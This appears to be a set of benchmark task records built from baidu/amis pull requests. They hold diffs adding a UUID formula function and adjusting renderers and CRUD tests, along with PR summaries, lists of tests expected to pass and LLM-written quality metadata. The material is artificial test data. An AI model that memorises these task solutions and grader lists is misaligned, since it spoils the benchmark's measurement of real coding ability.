b/packages/amis/src/renderers/Each.tsx @@ -1,5 +1,12 @@ import React from 'react'; -import {Renderer, RendererProps, buildStyle, isPureVariable} from 'amis-core'; +import { + CustomStyle, + Renderer, + RendererProps, + buildStyle, + isPureVariable, + setThemeClassName +} from 'amis-core'; import {Schema} from 'amis-core'; import {resolveVariable, resolveVariableAndFilter} from 'amis-core'; import {createObject, getPropValue, isObject} from 'amis-core'; @@ -96,7 +103,11 @@ export default class Each extends React.Component<EachProps> { indexKeyName, placeholder, classnames: cx, - translate: __ + translate: __, + env, + id, + wrapperCustomStyle, + themeCss } = this.props; const value = getPropValue(this.props, props => @@ -124,7 +135,14 @@ export default class Each extends React.Component<EachProps> { } return ( - <div className={cx('Each', className)} style={buildStyle(style, data)}> + <div + className={cx( + 'Each', + className, + setThemeClassName('baseControlClassName', id, themeCss) + )} + style={buildStyle(style, data)} + > {Array.isArray(arr) && arr.length && items ? ( arr.map((item: any, index: number) => ( <EachItem @@ -144,6 +162,20 @@ export default class Each extends React.Component<EachProps> { {render('placeholder', __(placeholder))} </div> )} + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/SwitchContainer.tsx b/packages/amis/src/renderers/SwitchContainer.tsx index 62d8f598a..7aad5492c 100644 --- a/packages/amis/src/renderers/SwitchContainer.tsx +++ b/packages/amis/src/renderers/SwitchContainer.tsx @@ -80,7 +80,7 @@ export default class SwitchContainer extends React.Component< componentDidUpdate(preProps: SwitchContainerProps) { const items = this.props.items || []; - if (this.state.activeIndex >= 0 && !items[this.state.activeIndex]) { + if (this.state.activeIndex > 0 && !items[this.state.activeIndex]) { this.setState({ activeIndex: 0 });
fix(amis-editor): Calendar文档链接拼写错误 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> Fixed a typo in the `docLink` property of the `CalendarPlugin` class in `Calendar.tsx`. This ensures that the plugin's documentation link works as expected. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> > _`docLink` was wrong_ > _Calendar spelling fixed_ > _Spring of clarity_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> * Fix the `docLink` property of the `CalendarPlugin` class to use the correct spelling of `calendar` in the URL ([link](https://github.com/baidu/amis/pull/8641/files?diff=unified&w=0#diff-aa42249f05b7b76df59f07697b763b6f6657b8ff0de5393b5a160dddd4edd284L23-R23)). This improves the documentation and user experience of the plugin.
**Title** Multiple stability and usability fixes across editor plugins, core stores and UI components **Problem** - Several components and utilities exhibited incorrect behavior: typo in a documentation link, faulty equality checks in the CRUD store, missing support for dynamic sub‑editor variables, inadequate validation of list item counts, and theming inconsistencies. - A new text‑function (UUID) was referenced but not implemented, and minor UI glitches existed in range calculations, toolbar keys, and switch container state handling. **Root Cause** - Inaccurate logic and hard‑coded data structures in core stores and plugins, lack of a functional API for variable extraction, and missing implementations for newly documented features. **Fix / Expected Behavior** - Correct the documentation URL for the calendar plugin. - Reverse the equality logic in the CRUD store to properly detect changes. - Replace the static sub‑editor variable definition with a callable API, allowing schema‑driven variable names and updating all consumers. - Enforce a minimum item count in list controls and provide user feedback when deletion would violate this rule. - Introduce a fully documented UUID generation function with configurable length. - Refine range step rounding, ensure unique keys for CRUD toolbar items, and apply proper theming class names in the `Each` renderer. - Add UI enhancements to SwitchContainer (mandatory item count, theme configuration, custom CSS) and adjust active‑index handling to avoid unnecessary resets. **Risk & Validation** - Changing the sub‑editor variable API may affect existing plugins; verify backward compatibility through unit tests and manual plugin checks. - New UUID logic must respect length limits and not break existing formula evaluations; add tests for default and custom lengths. - UI changes (minLength, theming, key handling) should be validated in the editor and runtime environments to ensure no regressions in layout or interaction.
8,641
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,11 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + expect(evaluate('${UUID()}', {}).length).toBe(32); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2'); diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index 043ea6389..1f5aae08c 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -20,6 +20,7 @@ * 17. api 返回格式支持取对象中的第一个数组 * 18. CRUD 事件 * 19. fetchInitData silent 静默请求 + * 20. CRUD表头查询字段更新后严格比较场景 */ import { @@ -1046,9 +1047,8 @@ test('17. should use the first array item in the response if provided', async () ) ); - waitFor(() => { - expect(container.querySelectorAll('tbody>tr').length).toBe(2); - }); + await wait(200); + expect(container.querySelectorAll('tbody>tr').length).toBe(2); }); describe('18. inner events', () => { @@ -1149,3 +1149,169 @@ test('19. fetchInitData silent true', async () => { expect(notify).toBeCalledTimes(1); }); }); + +test('20. CRUD filters contain fields that modification inspection should use strict mode', async () => { + let keyword; + const mockFetcher = jest.fn().mockImplementation((req) => { + /** mock.calls[0][0]拿不到filter里的参数,先用闭包测试吧 */ + keyword = req.data.version; + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: 0, + items: [] + } + } + }) + }); + const {container} = render( + amisRender( + { + type: 'page', + body: [ + { + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": { + "method": "post", + "url": "/api/mock/crud" + }, + "filter": { + "body": [ + { + "type": "select", + "name": "version", + "label": "version", + "clearable": true, + "options": [ + {"label": "0", "value": 0}, + {"label": "1", "value": 1}, + {"label": "true", "value": true}, + {"label": "false", "value": false}, + {"label": "emptyString", "value": ''}, + {"label": "stringZero", "value": '0'}, + {"label": "stringOne", "value": '1'} + ] + } + ], + "actions": [ + { + "type": "submit", + "label": "SubmitBtn", + "primary": true + } + ] + }, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "version", + "label": "Engine version engine" + } + ], + } + ] + }, + {}, + makeEnv({fetcher: mockFetcher}) + ) + ); + + const select = container.querySelector('.cxd-Select')!; + const submitBtn = container.querySelector("button[type='submit']")!; + + fireEvent.click(select); + await wait(200); + let options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 从 0 -> false 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[4]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(''); + + /** 从 '' -> 0 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 切换到1 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[1]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(1); + + /** 从 1 -> true 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[2]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(true); + + /** 从 true -> '1' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[6]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('1'); + + /** 切换到false */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '0' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[5]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('0'); +}, 7000);
[ "evalute:UUID" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(self, length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: Optional numeric `length` (clamped to the range 0‑32, default 32) indicating the desired length of the returned UUID string. Outputs: `string` – a randomly generated UUID string trimmed to the requested length (hex characters, using the internal `uuidv4` helper). Description: Generates a random UUID string for use in formula evaluation via the `UUID()` function; when a length argument is provided the UUID is truncated accordingly.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 14, "num_modified_lines": 161, "pr_author": "chengjinyang0", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/baidu/amis/pull/8641/files?diff=unified&w=0#diff-aa42249f05b7b76df59f07697b763b6f6657b8ff0de5393b5a160dddd4edd284L23-R23" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "documentation_enh" ], "reason": null, "reasoning": "The issue requests fixing a typo in the CalendarPlugin's docLink URL. The required change is a single string correction, which aligns with the described behavior. However, the provided test patch adds many unrelated tests (UUID, CRUD strict mode, etc.) that are not mentioned in the issue, indicating that the patch bundles extra test changes unrelated to the fix. This is a patch artifact problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests for UUID function in amis-formula are unrelated to the Calendar docLink typo.", "Extended CRUD filter strict mode test does not pertain to the documentation link.", "Various UI component adjustments (theme, range, each, switch container) are unrelated to the issue." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e7f23c9859cec2bad56dbd11a4b12615798141c8
2023-11-08 08:52:54
baidu__amis-8662
diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * @example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +}
feat: 公式支持uuid生成 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> This pull request introduces a new `UUID` function to the `amis-formula` package. The function generates a UUID string of a given length and can be used in formulas. The pull request also updates the documentation and the code of the `Evaluator` class to support the new function. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> > _From the depths of the code, a new function rises_ > _`UUID` is its name, it generates random surprises_ > _With hexadecimal strings, it fills the `doc.md`_ > _And the `Evaluator` class, invokes it with fury_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> * Add a new `UUID` function to generate UUID strings of a given length ([link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R594-R603), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R1026-R1042), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1517-R1531), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R2432-R2453))
**Title** Add built‑in UUID generation to the formula language **Problem** Formulas currently have no way to create unique identifier strings, limiting scenarios that require random keys or tokens. Users must resort to external logic to obtain UUIDs. **Root Cause** The evaluator did not expose any text‑based function for generating UUIDs and the documentation omitted such capability. **Fix / Expected Behavior** - Introduce a new text function that returns a UUID string. - Accept an optional length argument, defaulting to a standard 32‑character identifier and truncating safely if a shorter length is requested. - Ensure the generated string follows the typical UUID format. - Update the formula reference documentation to describe the function, its parameters, and return type. - Provide the underlying utility for UUID creation within the evaluator module. **Risk & Validation** - Verify that the function respects length boundaries and always returns a correctly formatted UUID. - Run the existing formula test suite to confirm no regression in other functions. - Manually test the new function in typical formula expressions and confirm the documentation reflects the behavior.
8,662
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,11 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + expect(evaluate('${UUID()}', {}).length).toBe(32); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2');
[ "evalute:UUID" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "lexer:simple", "lexer:filter", "lexer:exception", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "async-evalute:namespace" ]
Method: Evaluator.fnUUID(length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: optional numeric **length** – desired length of the generated UUID string, clamped to the range 0‑32 (default 32). Outputs: **string** – a UUID‑style hexadecimal string trimmed to the requested length. Errors: none; invalid lengths are silently clamped. Description: Implements the `UUID` formula function; it creates a version‑4 UUID via the internal `uuidv4` helper and returns the first *length* characters, enabling use like `UUID()` or `UUID(8)` in formula expressions.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 3, "num_modified_lines": 64, "pr_author": "allenve", "pr_labels": [ "feat" ], "llm_metadata": { "code": null, "code_quality": null, "confidence": null, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": null, "external_urls": null, "intent_completeness": null, "patch": null, "pr_categories": null, "reason": null, "reasoning": null, "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": null, "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
5fe0edd141e14171ce9c650b4b075d55c45a893e
2023-11-09 11:37:48
baidu__amis-8678
diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index e44b570c3..db1d8658d 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1524,8 +1524,8 @@ export class Evaluator { * * @returns {string} 生成的UUID字符串 */ - fnUUID(length: number = 32) { - const len = Math.min(Math.max(length, 0), 32); + fnUUID(length: number = 36) { + const len = Math.min(Math.max(length, 0), 36); return uuidv4().slice(0, len); }
feat: 公式支持uuid生成 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> Updated the `UUID` function and its test case to use the UUIDv4 format, which has 36 characters including hyphens. This ensures the generated values are valid and consistent with the standard. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> > _`fnUUID` length_ > _Changed to match UUIDv4_ > _Winter of refactor_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> * Change the `UUID` function to generate and return a valid UUIDv4 value with 36 characters including hyphens ([link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1527-R1528), [link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574)) * Update the test case for the `UUID` function to check the validity and length of the generated value in `packages/amis-formula/__tests__/evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574))
**Title** Align UUID generator with standard UUIDv4 length **Problem** The formula engine’s UUID function produced identifiers limited to 32 characters, truncating the standard 36‑character UUIDv4 format and potentially yielding invalid identifiers. Consumers relying on the function expected a full UUID string. **Root Cause** The function’s default length and maximum bound were hard‑coded to 32, mismatching the actual length of a UUIDv4. **Fix / Expected Behavior** - Default length is now the full 36 characters of a UUIDv4. - Upper bound is increased to 36, allowing the complete identifier to be returned. - When a custom length is supplied, the function still respects the 0‑36 range and slices the UUID accordingly. - The returned value always conforms to the UUIDv4 pattern, including hyphens. **Risk & Validation** - Verify that existing callers handling 32‑character IDs either accept the extended length or explicitly pass a shorter length. - Run the full test suite, especially the formula evaluation tests that check UUID length and format. - Perform a quick regression check on any downstream modules that generate IDs via this function.
8,678
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 25a7e875f..151d84a7a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -564,7 +564,14 @@ test('evalute:Math', () => { }); test('evalute:UUID', () => { - expect(evaluate('${UUID()}', {}).length).toBe(32); + function isUUIDv4(value: string) { + return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( + value + ); + } + + expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); + expect(evaluate('${UUID()}', {}).length).toBe(36); expect(evaluate('${UUID(8)}', {}).length).toBe(8); });
[ "evalute:UUID" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(length?: number) Location: packages/amis-formula/src/evalutor.ts (class Evaluator) Inputs: - **length** (optional number): Desired length of the returned UUID string. Defaults to 36. The value is clamped to the range 0 – 36. Outputs: - **string**: A UUIDv4 formatted string (hexadecimal characters with hyphens) truncated to the requested length. When called without arguments it returns a full 36‑character UUID. If a length < 36 is supplied, the result is the first *length* characters of the UUID. Description: Generates a UUID version 4 value using the `uuidv4` library. The method is used by the formula evaluator via the `${UUID()}` expression; tests verify that the default output conforms to the UUIDv4 pattern and has length 36, and that a custom length (e.g., 8) returns a string of that exact length.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 1, "num_modified_lines": 2, "pr_author": "allenve", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.99, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1527-R1528", "https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests updating the UUID function to generate a UUIDv4 string (36 characters with hyphens) and adjusting its test to verify the format and length. The provided test patch directly checks that the generated value matches a UUIDv4 regex and has length 36, aligning with the stated requirement. There are no signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, patch artifacts, or hidden domain knowledge. Hence the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ab0832c3592097029685c7d617608d160be73a1b
2023-11-09 13:28:09
baidu__amis-8681
diff --git a/packages/amis-editor/src/plugin/Form/InputNumber.tsx b/packages/amis-editor/src/plugin/Form/InputNumber.tsx index a3b7cb8b4..a8cc38cad 100644 --- a/packages/amis-editor/src/plugin/Form/InputNumber.tsx +++ b/packages/amis-editor/src/plugin/Form/InputNumber.tsx @@ -19,6 +19,7 @@ import {defaultValue, getSchemaTpl, tipedLabel} from 'amis-editor-core'; import {ValidatorTag} from '../../validator'; import {getEventControlConfig} from '../../renderer/event-control/helper'; import {inputStateTpl} from '../../renderer/style-control/helper'; +import {Schema} from 'amis-core'; export class NumberControlPlugin extends BasePlugin { static id = 'NumberControlPlugin'; @@ -177,16 +178,20 @@ export class NumberControlPlugin extends BasePlugin { getSchemaTpl('kilobitSeparator'), getSchemaTpl('valueFormula', { - rendererSchema: context?.schema, + rendererSchema: (schema: Schema) => ({ + ...schema, + displayMode: 'base' + }), valueType: 'number' // 期望数值类型 }), getSchemaTpl('valueFormula', { name: 'min', - rendererSchema: { - ...context?.schema, - value: context?.schema.min - }, + rendererSchema: (schema: Schema) => ({ + ...schema, + value: context?.schema.min, + displayMode: 'base' + }), needDeleteProps: ['min'], // 避免自我限制 label: '最小值', valueType: 'number' @@ -194,10 +199,11 @@ export class NumberControlPlugin extends BasePlugin { getSchemaTpl('valueFormula', { name: 'max', - rendererSchema: { - ...context?.schema, - value: context?.schema.max - }, + rendererSchema: (schema: Schema) => ({ + ...schema, + value: context?.schema.max, + displayMode: 'base' + }), needDeleteProps: ['max'], // 避免自我限制 label: '最大值', valueType: 'number' diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index db1d8658d..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1524,8 +1524,8 @@ export class Evaluator { * * @returns {string} 生成的UUID字符串 */ - fnUUID(length: number = 36) { - const len = Math.min(Math.max(length, 0), 36); + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); return uuidv4().slice(0, len); }
